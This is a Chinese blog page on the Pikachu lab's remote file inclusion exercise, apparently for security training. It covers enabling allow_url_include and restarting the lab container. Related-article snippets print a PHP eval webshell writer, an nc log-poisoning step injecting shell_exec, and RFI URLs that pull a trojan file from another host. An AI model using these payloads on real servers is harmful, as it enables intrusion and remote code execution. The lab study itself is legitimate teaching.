Pikachu-File Inclusion-远程文件包含

最新推荐文章于 2025-08-20 13:45:14 发布
原创 最新推荐文章于 2025-08-20 13:45:14 发布 · 976 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#文件包含漏洞

 远程文件包含漏洞

        是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的,因此漏洞一旦存在,危害性会很大。但远程文件包含漏洞的利用条件较为苛刻;因此,在web应用系统的功能设计上尽量不要让前端用户直接传变量给包含函数,如果非要这么做,也一定要做严格的白名单策略进行过滤。

PHP的需要php.ini中配置

allow_url_fopen=On    // 默认情况下是打开的;
allow_url_include=On  // 默认情况下是关闭的;

开启配置

文件所在位置:

	/etc/php/7.3/apache2/php.ini

修改完成后,

重启容器, 

exit         #退出当前容器的/bin/bash
docker ps    #查找当前容器id
docker restart 4e4ccb0e81d2   #重启pikachu容器

最低0.47元/天 解锁文章
远程文件包含原理及利用
G3et的博客
01-27 921
远程文件包含漏洞的危害在于,攻击者可以通过包含恶意文件来执行任意代码,从而获取服务器的权限、控制服务器或窃取服务器上的敏感信息。为了防范远程文件包含漏洞,应当使用严格的输入验证和过滤机制,确保只允许包含受信任的文件。我们来复现一下,首先准备一个phpinfo,假设把这个phpinfo放到我们自己的服务器,或者上传一个图片马放在任何可以上传的地方等等,只要能访问就行。由于没有对用户提交的文件名进行任何的安全限制,所以攻击者可以通过提交远程服务器上的文件 URL 来包含并执行远程文件。先来看看正常的一个情况。
PiKachu-File Inclusion(文件包含漏洞)
m0_49025459的博客
04-22 1024
概述 File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文件包含的代码文件被写成了一个变量,且这个
文件包含File Inclusion
IVY20024的博客
08-20 1124
摘要:文件包含是Web开发中常见的代码复用技术,但如果实现不当会导致严重安全漏洞。其原理是通过用户可控的路径参数包含执行文件,分为本地文件包含(LFI)和远程文件包含(RFI)两类。攻击者可通过路径遍历、伪协议利用、日志包含等方式绕过限制,导致信息泄露或代码执行。防御措施包括输入验证白名单、禁用危险配置和代码规范。靶机实验展示了本地文件包含漏洞的实际利用过程。
File Inclusion(文件包含)
raynah的博客
06-30 572
File Inclusion(文件包含漏洞)概述 文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。 比如 在PHP中,提供了: include(),include_once() require(),require_once() 这些文件包含函数,这些函数在代码设计中被经常使用到。 大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。 但是,有些时候,文...
远程文件包含
Just for fun
10-20 2514
远程文件包含(Remote File Inclusion),简称RFI,与其对应的是本地文件包含(Local File Inclusion,LFI),它们都是通过PHP的包含函数即:require(),require_once(),include()和include_once()来使用。   一般情况下,用户通过包含函数将具有特定功能的函数或类包含到当前脚本中,是没有什么问题的。但是有时候,为...
远程执行文件包含
weixin_30347335的博客
01-08 339
<?php fputs(fopen("x.php","w"),"<?php @eval(\$_POST['x']);?>");?> 写入日志文件 chmod 777 /var/log/httpd nc xxx 80 <?php echo shell_exec($_GET['cmd']);?> cat /var/log/httpd...
Pikachu靶场-File Inclusion
sucker的博客
04-24 1069
文件包含漏洞File Inclusion Vulnerability)是Web应用程序中的一种常见安全漏洞,通常由于开发者未对用户输入进行严格过滤,导致攻击者能够包含并执行恶意文件。,攻击者准备恶意文件,在攻击机(192.168.23.182)上创建包含恶意代码的文本文件(如。攻击者通过篡改参数,包含服务器本地的敏感文件(如配置文件、日志文件等)。1,观察网站,提供了一个选择框,运行用户根据名字选择提交查询。1,观察网站,提供了一个选择框,运行用户根据名字选择提交查询。
pikachu-File Inclusion
ZhuoLLLLLL的博客
12-29 1273
通过这次漏洞的作业,我了解到了文件上传漏洞的一些相关知识,又更熟悉了一遍bp,一句话木马的上传,蚁键的连接包括在远程包含漏洞中,攻击者可以通过访问外部地址来加载远程的代码等。
Pikachu靶场通关笔记--File Inclusion(文件包含漏洞)
weixin_45908624的博客
12-13 1045
文件包含漏洞
html 远程包含,文件包含远程文件包含
weixin_35042546的博客
06-23 422
远程文件包含漏洞想要彻底防御,可以在服务器上的 php.ini 文件中将 allow_url_fopen 选项a把 on 改为 offowasp的文件路径为/etc/php5/cli/php.ini(各系统会根据安装路径出现异同)远程文件包含漏洞利用的思路是自己搭建一个服务器,将文件放在自己搭建的服务器内,远程包含即可这里使用apache;开启服务我们在网站的主目录下建立一个文件,webshell...
【CTF Web】Pikachu 远程文件包含 Writeup(文件包含漏洞+GET请求)
HEX9CF的技术博客
10-08 1151
文件包含,是一个功能。在各种开发语言中都提供了内置的文件包含函数,其可以使开发人员在一个代码文件中直接包含(引入)另外一个代码文件。比如 在PHP中,提供了:这些文件包含函数,这些函数在代码设计中被经常使用到。大多数情况下,文件包含函数中包含的代码文件是固定的,因此也不会出现安全问题。但是,有些时候,文件包含的代码文件被写成了一个变量,且这个变量可以由前端用户传进来,这种情况下,如果没有做足够的安全考虑,则可能会引发文件包含漏洞
远程文件包含漏洞
Ethan024的博客
04-08 891
什么是远程文件包含漏洞: 攻击者可以通过访问外部地址来加载远程代码。 实验环境: 皮卡丘靶场—File Inclusion(remote) (tips: 如果使用include和require,需在php.ini文件配置如下:allow_url_fopen = on //默认打开 allow_url_include = on //默认关闭) 实验步骤: 正常提交请求: 此时的url提交的内容为当前目标文件路径: http://localhost/pikaqiu.cn/vul/fileinclude/f
文件包含漏洞详解
热门推荐
把梦想放飞在蓝色的天空里...
07-14 1万+
原文作者: m4r10 http://hi.baidu.com/m4r10 转载请注明版权 &&&远程文件包含漏洞&&& 一、 什么才是"远程文件包含漏洞"?回答是:服务器通过php的特性(函数)去包含任意文件时,由于要包含的这个文件来源过滤不严,从而可以去包含一个恶意文件,而我们可以构造这个恶意文件来达到邪恶的目的。 涉及到的危险函数:include(),require()和incl
Web安全领域的探索之远程文件包含漏洞(LFI)
Innocence_0的博客
01-18 1689
Web安全领域的探索之远程文件包含漏洞(LFI)
远程文件包含实操
东隅的博客
07-01 299
远程文件包含实操
文件上传漏洞之——远程文件包含漏洞(RFI)
wsnbbz的博客
03-04 5071
定义 如果php.ini的配置选项allow_url_include为On的话,文件包含函数是可以加载远程文件的,这种漏洞被称为远程文件包含漏洞。利用远程文件包含漏洞,可以直接执行任意命令 原理 同本地文件包含原理,只是参数可以换成一个远程的url地址,此时包含的文件不能为php文件,可写成txt或者图片马等等 文件包含的时候,无视文件格式,只要文件中有php代码,就会被执行 复现 dvwa lo...
PTE_远程文件包含wp
CHUNJIUJUN的博客
08-13 674
一堆看不懂的东西,发现并没有本地文件包含的点 试试远程文件包含,发现是可以的 从远程服务器远程文件包含一个写了一句话木马的 1.txt 发现 txt 被双写了,应该是服务器端自动添加了一个 .txt 后缀,所以我们去掉我们的后缀 成功写入,执行命令,这里的 c 是我们一句话木马中自己写的哦 显示 get it 查看源码,发现key值 ...
网络安全系列之三十 远程文件包含***
weixin_33928137的博客
11-08 299
远程文件包含***Remote File Include,它也属于是“代码注入”的一种,其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。文件包含漏洞可能出现在JSP、PHP、ASP等语言中,原理都是一样的,本文只介绍PHP文件包含漏洞。本次实验需要使用2台Web服务器,实验环境如下:Web1,IP地址192.168.80.129,利用NPMserv搭建php网站。Web2,IP地址192...
pikachufile inclusion
最新发布
10-29
### Pikachu文件包含的使用 在pikachu中,文件包含相关操作通常通过构造特定的URL参数来实现。例如,在示例引用中给出了一个远程文件包含的URL:`http://127.0.0.1/pikachu-master/vul/fileinclude/fi_remote.php?filename=http://127.0.0.1/pikachu-master/shell.txt&submit=提交查询` ,这里通过 `filename` 参数指定要包含的文件,服务器会尝试包含该文件内容。当访问这个文件之后,就会执行该代码,在本地创建一个文件,包含一句话木马,如 `http://127.0.0.1:8080/pikachu/vul/fileinclude/fi_remote.php?filename=http://192.168.3.184:8080/aaa.txt&submit=提交` [^1][^3]。 ### 漏洞利用 文件包含漏洞分为本地文件包含(LFI)和远程文件包含(RFI)。本地文件包含仅能够对服务器本地的文件进行包含,由于服务器上的文件并不是攻击者所能够控制的,因此该情况下,攻击者更多的会包含一些固定的系统配置文件,从而读取系统敏感信息。很多时候本地文件包含漏洞会结合一些特殊的文件上传漏洞,从而形成更大的威力。例如攻击者可以上传一个包含恶意代码的文件,然后利用本地文件包含漏洞包含该文件,从而执行恶意代码。远程文件包含则允许攻击者指定一个远程服务器上的文件进行包含,攻击者可以构造包含恶意代码的远程文件,让目标服务器包含并执行,如通过构造恶意的 `aaa.txt` 文件,让目标服务器执行其中的恶意代码 [^2]。 ### 解决方案 - **输入验证**:对用户输入的文件名进行严格的验证和过滤,只允许包含合法的、预定义的文件。可以使用白名单机制,只允许包含在白名单中的文件。 - **禁用危险函数**:如果不需要使用远程文件包含功能,应在服务器配置中禁用相关的函数,如 `allow_url_fopen` 和 `allow_url_include` 等。 - **限制文件路径**:确保包含的文件路径在可控的范围内,避免攻击者通过构造特殊路径来包含敏感文件。 ```php <?php // 示例:白名单验证 $whitelist = array('file1.php', 'file2.php'); $filename = $_GET['filename']; if(in_array($filename, $whitelist)) { include($filename); } else { echo "Invalid file"; } ?> ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值